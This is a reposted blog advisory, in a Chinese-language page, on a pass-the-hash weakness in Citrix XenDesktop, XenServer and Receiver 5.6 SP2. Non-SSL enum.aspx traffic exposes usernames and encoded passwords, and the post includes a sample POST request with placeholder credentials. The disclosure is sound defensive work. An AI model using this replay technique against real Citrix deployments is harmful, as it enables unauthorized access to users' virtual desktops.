博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Citrix XenDesktop, XenServer, Receiver 5.6 SP2 Pass-The-Hash
阅读量:2435 次
发布时间:2019-05-10

本文共 1329 字,大约阅读时间需要 4 分钟。

 
Tested against: Citrix XenDesktop, XenServer, Receiver 5.6 SP2 (possibly other versions as well)By default, the authentication between the Citrix Receiver client to the Web interface is not configured to use SSL. If a company elects not to use SSL for this, the XML transaction between the receiver client and the Web Interface server to enum.aspx and launch.aspx contains the username and encoded password of the user.  If an attacker can sniff this authentication traffic, they can use the encoded password to perform a "pass-the-hash" type attack to log in as the user via Citrix Receiver and gain access to the users Virtual Desktop(s).POST /Citrix/XDPNAgent/enum.aspx HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: C:\PROGRA~1\Citrix\ICACLI~1\PNAMain.exeHost: xxx.xxx.xxx.xxxContent-Length: 705Connection: Keep-AliveCache-Control: no-cache
$PRELAUNCH$
permissions
icon-info
all
x
win32
ica30
content
domain\myuser
ENCODEDPASSWORDHERE
COMPUTER01
xxx.xxx.xxx.xxx
More information on how it works:http://eelsivart.blogspot.com/2011/12/citrix-receiver-xendesktop-pass-hash.html

转载地址:http://tjhmb.baihongyu.com/

你可能感兴趣的文章
MongoDB日志轮转和日志级别
查看>>
MySQL批量删除表
查看>>
MySQL5.6中limit的工作机制和order by limit优化原理
查看>>
Mongodb内存管理和使用情况情况查询
查看>>
seconds_behind_master监控复制延迟的不足及pt-heartbeat改进方法
查看>>
MongoDB状态查询详解:db.serverStatus()
查看>>
MySQL几点重要的性能指标计算和优化
查看>>
故障案例:磁盘空间不足可能引起的mysql问题
查看>>
故障案例:定时备份可能引起的问题
查看>>
故障案例:主从同步报错Fatal error: The slave I/O thread stops because master and slave have equal MySQL server
查看>>
故障案例:mysql5.6下,mysqlbinlog版本不对可能导致的问题
查看>>
故障案例:slave延迟很大
查看>>
ProxySQL快速上手
查看>>
故障案例---innodb表出现大量的Waiting for table level lock
查看>>
sql_log_bin在GTID复制下的一个现象
查看>>
双主+haproxy手工切换的一个注意点
查看>>
利用binlog2sql实现闪回
查看>>
mongos分片集群下db数量过多导致服务不可用
查看>>
gtid主从报错When@@SESSION.GTID_NEXT is set to a GTID
查看>>
利用mongosync做数据库迁移
查看>>